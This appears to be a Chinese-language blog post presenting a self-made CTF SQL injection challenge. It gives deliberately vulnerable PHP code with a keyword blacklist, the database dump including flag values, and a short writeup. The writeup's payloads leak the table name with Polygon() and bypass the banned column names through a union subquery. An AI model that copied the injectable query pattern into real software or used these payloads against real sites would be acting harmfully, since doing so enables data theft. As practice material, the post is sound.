NEKO

自己写得题目ORZ

2018/06/20

SQL注入

sqli1

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
error_reporting(0);
$conn = mysql_connect('127.0.0.1', 'root', 'root') or die("could not connect:" . mysql_error());
mysql_select_db('neko_web1', $conn) or die('can not use:' . mysql_error());
if (isset($_GET['id'])) {
$id = $_GET['id'];
if (preg_match('/(flag|\/|\%|or|and|group|where)/i', $id)) {
die('(;´д`)ゞ');
}
$sql = "select username,phone from info where id='" . $id . "'";
$result = mysql_query($sql) or die(mysql_error());
$row = mysql_fetch_array($result);
if ($row) {
echo "<hr>";
echo "user:" . $row['username'] . "<br>";
echo "phone:" . $row['phone'] . "<br>";
echo "<hr>";
} else {
echo "user not exist";
}

}

数据库:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Host: localhost  (Version: 5.5.53)
# Date: 2018-06-20 14:32:31
# Generator: MySQL-Front 5.3 (Build 4.234)

/*!40101 SET NAMES utf8 */;

#
# Structure for table "info"
#

DROP TABLE IF EXISTS `info`;
CREATE TABLE `info` (
`id` int(4) NOT NULL AUTO_INCREMENT,
`username` varchar(20) NOT NULL,
`email` varchar(20) NOT NULL,
`phone` int(20) NOT NULL,
`flag` varchar(30) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;

#
# Data for table "info"
#

/*!40000 ALTER TABLE `info` DISABLE KEYS */;
INSERT INTO `info` VALUES (1,'neko','neko@qq.com',123456,'flag{not_true_flag}'),(2,'syabe','syabe@qq.com',75391,'flag{n3k0_kn}');
/*!40000 ALTER TABLE `info` ENABLE KEYS */;

考点:

1
2
列名被禁
Polygon()函数获取表名

wp:

1
2
id=1' %26%26 Polygon(id)-- - =>info
id=-1' union select `1`,`5` from (select 1,2,3,4,5 union select * from info)as neko limit 2,1-- -

原文作者: n3k0

发表日期: June 20th 2018, 2:52:44

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. SQL注入
    1. 1.1. sqli1